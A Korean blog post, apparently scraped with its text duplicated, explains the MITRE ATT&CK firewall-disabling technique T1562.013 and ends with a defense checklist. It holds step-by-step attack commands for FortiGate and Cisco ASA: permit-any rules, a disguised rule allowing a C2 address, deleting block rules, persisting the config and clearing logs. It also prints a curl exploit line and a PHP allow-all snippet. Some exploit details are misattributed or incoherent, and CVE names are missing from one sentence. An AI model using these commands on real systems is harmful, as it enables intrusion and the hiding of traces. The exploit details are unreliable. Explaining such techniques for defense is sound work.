MITRE

네트워크 방화벽 무력화: 엔터프라이즈 방어막을 뚫는 공격 기법 | T1562.013

2026년 1월 19일

읽는 시간 약 9분

MITRE ATT&CK네트워크 보안방화벽취약점 분석사이버 공격

MITRE ATT&CK T1562.013 기법으로 공격자가 Fortinet, Cisco 방화벽 10,000대를 무력화한 실제 사례와 동작 원리를 분석합니다. CVE-2024-55591 LockBit 공격부터 방어 전략까지 완전 해부.

$ cat ./report.md

네트워크 방화벽 무력화: 엔터프라이즈 방어막을 뚫는 공격 기법 | T1562.013

COMMENTS (0)

댓글은 익명으로 작성되며, 삭제 비밀번호를 설정하면 본인만 삭제할 수 있습니다. 비밀번호를 설정하지 않은 댓글은 누구나 삭제할 수 있습니다.

VIEW_ALL_REPORTS

cd ../blog

MITRE

네트워크 방화벽 무력화: 엔터프라이즈 방어막을 뚫는 공격 기법 | T1562.013

2026년 1월 19일

읽는 시간 약 9분

MITRE ATT&CK네트워크 보안방화벽취약점 분석사이버 공격

$ cat ./report.md

Phase 1: 배경과 필요성

2024년 한 해 동안 Fortinet FortiGate 방화벽 취약점으로 인해 전 세계 10,000대 이상의 네트워크 디바이스가 공격을 당했다. 이는 단순히 방화벽 소프트웨어의 문제가 아니라, 네트워크 경계 보안의 핵심 구성 요소인 방화벽 자체가 공격 대상이 되었다는 의미이다.

전통적으로 네트워크 보안은 성벽 모델(Castle Model)을 따랐다. 외부와 내부 사이에 방화벽이라는 거대한 성벽을 세우고, 모든 트래픽이 이 성벽의 문(포트)을 통해서만 지나가도록 제한했다. 하지만 공격자들은 성벽 자체를 무너뜨리거나 새로운 문을 만드는 방법을 터득했다.

기존 방식의 핵심 결함은 방화벽 관리 권한을 탈취당하면 모든 보안 정책이 무력화된다는 점이었다. 마치 성벽의 열쇠를 도둑맞으면 성 전체가 무방비 상태가 되는 것과 같다.

T1562.013은 공격자가 네트워크 방화벽의 설정을 직접 조작하여 방어 메커니즘을 우회하는 기법이다.

Phase 2: 핵심 개념 정의

T1562.013은 적대자가 네트워크 디바이스 기반 방화벽을 완전히 비활성화하거나 특정 규칙을 추가, 삭제, 수정하여 네트워크 제한을 우회하는 공격 기법이다.

Adversaries may disable or modify network device based firewall mechanisms to bypass controls limiting network usage. Modifications to network device based firewalls may take the form of adding, deleting, or modifying rules and may be performed remotely or locally. — MITRE ATT&CK T1562.013

위 정의에 따르면, 이 공격은 단순히 방화벽을 끄는 것뿐만 아니라 정교하게 규칙을 조작하는 것도 포함한다.

핵심 구성 요소

타겟 식별: 네트워크 경계에 위치한 방화벽 디바이스 탐지
접근 권한 획득: 관리자 계정 또는 관리 인터페이스 접근
규칙 조작: 방화벽 정책 추가/삭제/수정
지속성 확보: 재부팅 후에도 유지되는 설정 변경
은밀성 유지: 로그 삭제 또는 탐지 회피

용어	설명
T1562.013	범위: 네트워크 디바이스 방화벽 / 주요 차이점: 하드웨어/펌웨어 기반 방화벽 조작 / 공격 대상: Cisco ASA, Fortinet FortiGate
T1562.004	범위: 시스템 방화벽 / 주요 차이점: 호스트 기반 방화벽 비활성화 / 공격 대상: Windows Firewall, iptables
T1562.007	범위: 클라우드 방화벽 / 주요 차이점: 클라우드 네이티브 방화벽 수정 / 공격 대상: AWS Security Groups, Azure NSG
T1562.001	범위: 보안 도구 전반 / 주요 차이점: EDR/AV/모니터링 도구 무력화 / 공격 대상: CrowdStrike, SentinelOne

Phase 3: 동작 원리

전체 공격 흐름

T1562.013 네트워크 방화벽 무력화 공격 흐름

1단계: 방화벽 관리 접근 획득

공격자는 다음 세 가지 방법 중 하나로 방화벽 관리 권한을 획득한다:

방법 1: 취약점 악용 최근 Fortinet 사례처럼, 인터넷에 노출된 방화벽의 관리 인터페이스에서 인증 우회 취약점을 악용한다.

bash

# 실제 공격에서 사용된 Fortinet 취약점 스캔 명령
nmap -p 443,80,10443 --script http-vuln-cve2024-55591 target_firewall

방법 2: 정당한 계정 탈취 네트워크 관리자의 계정을 피싱이나 크리덴셜 스터핑으로 탈취한다.

방법 3: 내부 접근 후 권한 상승 이미 내부 네트워크에 침투한 상태에서 방화벽 관리 VLAN으로 측면 이동한다.

2단계: 현재 방화벽 정책 분석

공격자는 기존 방화벽 규칙을 분석하여 어떤 트래픽이 차단되고 있는지 파악한다:

bash

# Cisco ASA 방화벽 규칙 조회
show access-list
show route
show nat

# Fortinet FortiGate 정책 조회
get firewall policy
get router static

3단계: 악성 규칙 삽입

공격자는 세 가지 방식으로 방화벽 정책을 조작한다:

A. 모든 트래픽 허용 규칙 추가

bash

# Cisco ASA 예시
configure terminal
access-list OUTSIDE_IN extended permit ip any any
access-group OUTSIDE_IN in interface outside

# Fortinet FortiGate 예시
config firewall policy
    edit 1
        set srcintf "wan1"
        set dstintf "internal"
        set srcaddr "all"
        set dstaddr "all"
        set action accept
        set schedule "always"
        set service "ALL"
    next
end

B. 특정 C2 서버 허용 정교한 공격자는 눈에 띄지 않게 특정 IP나 포트만 허용하는 규칙을 추가한다:

bash

# 특정 C2 서버(203.0.113.50)로의 HTTPS 트래픽 허용
config firewall policy
    edit 100
        set srcintf "internal"
        set dstintf "wan1"
        set srcaddr "all"
        set dstaddr "203.0.113.50"
        set action accept
        set service "HTTPS"
        set comment "System Update Service"
    next
end

C. 기존 차단 규칙 삭제

bash

# 특정 정책 삭제
config firewall policy
    delete 25
end

# 또는 정책 비활성화
config firewall policy
    edit 25
        set status disable
    next
end

4단계: 설정 지속성 확보

공격자는 방화벽 재부팅 후에도 변경사항이 유지되도록 설정을 저장한다:

bash

# Cisco ASA
write memory

# Fortinet FortiGate
execute backup config flash

5단계: 로그 흔적 제거

마지막으로 공격자는 자신의 활동 흔적을 지웁니다:

bash

# FortiGate 로그 삭제
execute log delete
diagnose log clear

# 관리 세션 로그 삭제
execute log filter category 3
execute log delete

Phase 4: 보안 관점 — 공격자의 시선

공격자가 노리는 약점

공격자에게 네트워크 방화벽은 단일 실패 지점(Single Point of Failure) 이다. 한 번의 성공적인 침투로 전체 네트워크 경계 보안을 무력화할 수 있기 때문이다.

특히 공격자들이 주목하는 방화벽의 구조적 약점은 다음과 같다:

중앙 집중식 관리: 하나의 관리 콘솔이 모든 정책을 제어
높은 권한 요구: 관리자 계정이 모든 규칙을 변경 가능
인터넷 노출: 원격 관리를 위해 관리 인터페이스가 외부에 노출
펌웨어 취약점: 하드웨어 기반이라 패치가 늦거나 어려움

실제 공격 시나리오

네트워크 방화벽 공격 흐름도

실제 공격 사례

1. Fortinet FortiGate LockBit 랜섬웨어 사건 (CVE-2024-55591)

InTheCyber 보고서에 따르면, 노출된 Fortinet FortiGate 방화벽 인터페이스가 LockBit 랜섬웨어 공격의 진입점이 되었다. 공격자는 다음 단계를 거쳤다:

bash

# 1. 취약점 스캔
nmap -sV -p 443,10443 --script ssl-enum-ciphers target_fortigate

# 2. CVE-2024-55591 익스플로잇
curl -k "https://target:10443/remote/fgt_lang?lang=../../../../..//////////dev/cmdb/sslvpn_websession"

# 3. 관리자 세션 하이재킹 후 정책 조작
config firewall policy
    edit 999
        set srcintf "wan1"
        set dstintf "internal"
        set srcaddr "all"
        set dstaddr "all"
        set action accept
        set service "ALL"
        set comment "Temporary Rule"
    next
end

2. Palo Alto Networks CVE-2025-0108 연계 공격

Palo Alto Networks는 과 를 연계한 공격을 확인했다:

CVE-2024-9474: 인증 우회로 관리 인터페이스 접근
CVE-2025-0108: PHP 스크립트 실행으로 방화벽 정책 조작

php

// 공격자가 실행한 PHP 스크립트 (단순화)
<?php
// 모든 인바운드 트래픽 허용 규칙 추가
system("configure");
system("set rulebase security rules allow-all from any to any");
system("commit");
?>

공격자의 전술적 이점

즉시성: 방화벽 규칙은 즉시 적용되므로 공격자는 변경 후 바로 우회 경로를 사용할 수 있다.

지속성: 설정이 저장되면 방화벽 재부팅 후에도 악성 규칙이 유지된다.

은밀성: 기존 규칙 사이에 악성 규칙을 삽입하면 관리자가 눈치채기 어렵다.

올바른 방어 체크리스트

관리 인터페이스 격리
- 관리 콘솔을 별도 VLAN으로 분리
- 인터넷 직접 노출 금지
- VPN 또는 점프 서버를 통한 접근만 허용
다중 인증 강화
- 관리자 계정에 MFA 핵심 적용
- 특권 계정 별도 관리
- 세션 타임아웃 설정
변경 사항 모니터링
- 방화벽 정책 변경 시 실시간 알림
- 설정 백업 자동화
- 변경 승인 프로세스 구축
정기적 보안 점검
- 방화벽 펌웨어 최신 버전 유지
- 불필요한 서비스 비활성화
- 정책 규칙 정기 검토

Phase 5: 정리와 연결

T1562.013은 네트워크 방화벽의 중앙 집중식 관리 구조를 악용하여 전체 네트워크 경계 보안을 무력화하는 강력한 공격 기법이다.

이 기법과 관련된 다른 방어 무력화 공격들을 함께 살펴보면 더 포괄적인 보안 전략을 수립할 수 있다. 시스템 방화벽 무력화 공격과 클라우드 방화벽 무력화 공격도 유사한 원리로 작동하지만 각각 다른 환경과 도구를 대상으로 한다.

다음에는 공격자가 방화벽을 우회한 후 사용하는 네트워크 장비 CLI 공격 기법과 보안 무력화의 전체적인 전술 체계를 살펴볼 예정이다.

참고 자료

COMMENTS (0)

댓글은 익명으로 작성되며, 삭제 비밀번호를 설정하면 본인만 삭제할 수 있습니다. 비밀번호를 설정하지 않은 댓글은 누구나 삭제할 수 있습니다.

VIEW_ALL_REPORTS

Phase 1: 배경과 필요성

T1562.013은 공격자가 네트워크 방화벽의 설정을 직접 조작하여 방어 메커니즘을 우회하는 기법이다.

Phase 2: 핵심 개념 정의

Adversaries may disable or modify network device based firewall mechanisms to bypass controls limiting network usage. Modifications to network device based firewalls may take the form of adding, deleting, or modifying rules and may be performed remotely or locally. — MITRE ATT&CK T1562.013

위 정의에 따르면, 이 공격은 단순히 방화벽을 끄는 것뿐만 아니라 정교하게 규칙을 조작하는 것도 포함한다.

핵심 구성 요소

타겟 식별: 네트워크 경계에 위치한 방화벽 디바이스 탐지
접근 권한 획득: 관리자 계정 또는 관리 인터페이스 접근
규칙 조작: 방화벽 정책 추가/삭제/수정
지속성 확보: 재부팅 후에도 유지되는 설정 변경
은밀성 유지: 로그 삭제 또는 탐지 회피

용어	설명
T1562.013	범위: 네트워크 디바이스 방화벽 / 주요 차이점: 하드웨어/펌웨어 기반 방화벽 조작 / 공격 대상: Cisco ASA, Fortinet FortiGate
T1562.004	범위: 시스템 방화벽 / 주요 차이점: 호스트 기반 방화벽 비활성화 / 공격 대상: Windows Firewall, iptables
T1562.007	범위: 클라우드 방화벽 / 주요 차이점: 클라우드 네이티브 방화벽 수정 / 공격 대상: AWS Security Groups, Azure NSG
T1562.001	범위: 보안 도구 전반 / 주요 차이점: EDR/AV/모니터링 도구 무력화 / 공격 대상: CrowdStrike, SentinelOne

Phase 3: 동작 원리

전체 공격 흐름

T1562.013 네트워크 방화벽 무력화 공격 흐름

1단계: 방화벽 관리 접근 획득

공격자는 다음 세 가지 방법 중 하나로 방화벽 관리 권한을 획득한다:

방법 1: 취약점 악용 최근 Fortinet 사례처럼, 인터넷에 노출된 방화벽의 관리 인터페이스에서 인증 우회 취약점을 악용한다.

bash

# 실제 공격에서 사용된 Fortinet 취약점 스캔 명령
nmap -p 443,80,10443 --script http-vuln-cve2024-55591 target_firewall

방법 2: 정당한 계정 탈취 네트워크 관리자의 계정을 피싱이나 크리덴셜 스터핑으로 탈취한다.

방법 3: 내부 접근 후 권한 상승 이미 내부 네트워크에 침투한 상태에서 방화벽 관리 VLAN으로 측면 이동한다.

2단계: 현재 방화벽 정책 분석

공격자는 기존 방화벽 규칙을 분석하여 어떤 트래픽이 차단되고 있는지 파악한다:

bash

# Cisco ASA 방화벽 규칙 조회
show access-list
show route
show nat

# Fortinet FortiGate 정책 조회
get firewall policy
get router static

3단계: 악성 규칙 삽입

공격자는 세 가지 방식으로 방화벽 정책을 조작한다:

A. 모든 트래픽 허용 규칙 추가

bash

# Cisco ASA 예시
configure terminal
access-list OUTSIDE_IN extended permit ip any any
access-group OUTSIDE_IN in interface outside

# Fortinet FortiGate 예시
config firewall policy
    edit 1
        set srcintf "wan1"
        set dstintf "internal"
        set srcaddr "all"
        set dstaddr "all"
        set action accept
        set schedule "always"
        set service "ALL"
    next
end

B. 특정 C2 서버 허용 정교한 공격자는 눈에 띄지 않게 특정 IP나 포트만 허용하는 규칙을 추가한다:

bash

# 특정 C2 서버(203.0.113.50)로의 HTTPS 트래픽 허용
config firewall policy
    edit 100
        set srcintf "internal"
        set dstintf "wan1"
        set srcaddr "all"
        set dstaddr "203.0.113.50"
        set action accept
        set service "HTTPS"
        set comment "System Update Service"
    next
end

C. 기존 차단 규칙 삭제

bash

# 특정 정책 삭제
config firewall policy
    delete 25
end

# 또는 정책 비활성화
config firewall policy
    edit 25
        set status disable
    next
end

4단계: 설정 지속성 확보

공격자는 방화벽 재부팅 후에도 변경사항이 유지되도록 설정을 저장한다:

bash

# Cisco ASA
write memory

# Fortinet FortiGate
execute backup config flash

5단계: 로그 흔적 제거

마지막으로 공격자는 자신의 활동 흔적을 지웁니다:

bash

# FortiGate 로그 삭제
execute log delete
diagnose log clear

# 관리 세션 로그 삭제
execute log filter category 3
execute log delete

Phase 4: 보안 관점 — 공격자의 시선

공격자가 노리는 약점

특히 공격자들이 주목하는 방화벽의 구조적 약점은 다음과 같다:

중앙 집중식 관리: 하나의 관리 콘솔이 모든 정책을 제어
높은 권한 요구: 관리자 계정이 모든 규칙을 변경 가능
인터넷 노출: 원격 관리를 위해 관리 인터페이스가 외부에 노출
펌웨어 취약점: 하드웨어 기반이라 패치가 늦거나 어려움

실제 공격 시나리오

네트워크 방화벽 공격 흐름도

실제 공격 사례

1. Fortinet FortiGate LockBit 랜섬웨어 사건 (CVE-2024-55591)

InTheCyber 보고서에 따르면, 노출된 Fortinet FortiGate 방화벽 인터페이스가 LockBit 랜섬웨어 공격의 진입점이 되었다. 공격자는 다음 단계를 거쳤다:

bash

# 1. 취약점 스캔
nmap -sV -p 443,10443 --script ssl-enum-ciphers target_fortigate

# 2. CVE-2024-55591 익스플로잇
curl -k "https://target:10443/remote/fgt_lang?lang=../../../../..//////////dev/cmdb/sslvpn_websession"

# 3. 관리자 세션 하이재킹 후 정책 조작
config firewall policy
    edit 999
        set srcintf "wan1"
        set dstintf "internal"
        set srcaddr "all"
        set dstaddr "all"
        set action accept
        set service "ALL"
        set comment "Temporary Rule"
    next
end

2. Palo Alto Networks CVE-2025-0108 연계 공격

Palo Alto Networks는 과 를 연계한 공격을 확인했다:

CVE-2024-9474: 인증 우회로 관리 인터페이스 접근
CVE-2025-0108: PHP 스크립트 실행으로 방화벽 정책 조작

php

// 공격자가 실행한 PHP 스크립트 (단순화)
<?php
// 모든 인바운드 트래픽 허용 규칙 추가
system("configure");
system("set rulebase security rules allow-all from any to any");
system("commit");
?>

공격자의 전술적 이점

즉시성: 방화벽 규칙은 즉시 적용되므로 공격자는 변경 후 바로 우회 경로를 사용할 수 있다.

지속성: 설정이 저장되면 방화벽 재부팅 후에도 악성 규칙이 유지된다.

은밀성: 기존 규칙 사이에 악성 규칙을 삽입하면 관리자가 눈치채기 어렵다.

올바른 방어 체크리스트

관리 인터페이스 격리
- 관리 콘솔을 별도 VLAN으로 분리
- 인터넷 직접 노출 금지
- VPN 또는 점프 서버를 통한 접근만 허용
다중 인증 강화
- 관리자 계정에 MFA 핵심 적용
- 특권 계정 별도 관리
- 세션 타임아웃 설정
변경 사항 모니터링
- 방화벽 정책 변경 시 실시간 알림
- 설정 백업 자동화
- 변경 승인 프로세스 구축
정기적 보안 점검
- 방화벽 펌웨어 최신 버전 유지
- 불필요한 서비스 비활성화
- 정책 규칙 정기 검토

Phase 5: 정리와 연결

T1562.013은 네트워크 방화벽의 중앙 집중식 관리 구조를 악용하여 전체 네트워크 경계 보안을 무력화하는 강력한 공격 기법이다.

다음에는 공격자가 방화벽을 우회한 후 사용하는 네트워크 장비 CLI 공격 기법과 보안 무력화의 전체적인 전술 체계를 살펴볼 예정이다.

네트워크 방화벽 무력화: 엔터프라이즈 방어막을 뚫는 공격 기법 | T1562.013

COMMENTS (0)

네트워크 방화벽 무력화: 엔터프라이즈 방어막을 뚫는 공격 기법 | T1562.013

Phase 1: 배경과 필요성

Phase 2: 핵심 개념 정의

핵심 구성 요소

관련 용어 비교

Phase 3: 동작 원리

전체 공격 흐름

1단계: 방화벽 관리 접근 획득

2단계: 현재 방화벽 정책 분석

3단계: 악성 규칙 삽입

4단계: 설정 지속성 확보

5단계: 로그 흔적 제거

Phase 4: 보안 관점 — 공격자의 시선

공격자가 노리는 약점

실제 공격 시나리오

실제 공격 사례

공격자의 전술적 이점

올바른 방어 체크리스트

Phase 5: 정리와 연결

참고 자료

관련 글 더 보기

안내 및 법적 고지

COMMENTS (0)

Phase 1: 배경과 필요성

Phase 2: 핵심 개념 정의

핵심 구성 요소

관련 용어 비교

Phase 3: 동작 원리

전체 공격 흐름

1단계: 방화벽 관리 접근 획득

2단계: 현재 방화벽 정책 분석

3단계: 악성 규칙 삽입

4단계: 설정 지속성 확보

5단계: 로그 흔적 제거

Phase 4: 보안 관점 — 공격자의 시선

공격자가 노리는 약점

실제 공격 시나리오

실제 공격 사례

공격자의 전술적 이점

올바른 방어 체크리스트

Phase 5: 정리와 연결

참고 자료

관련 글 더 보기

안내 및 법적 고지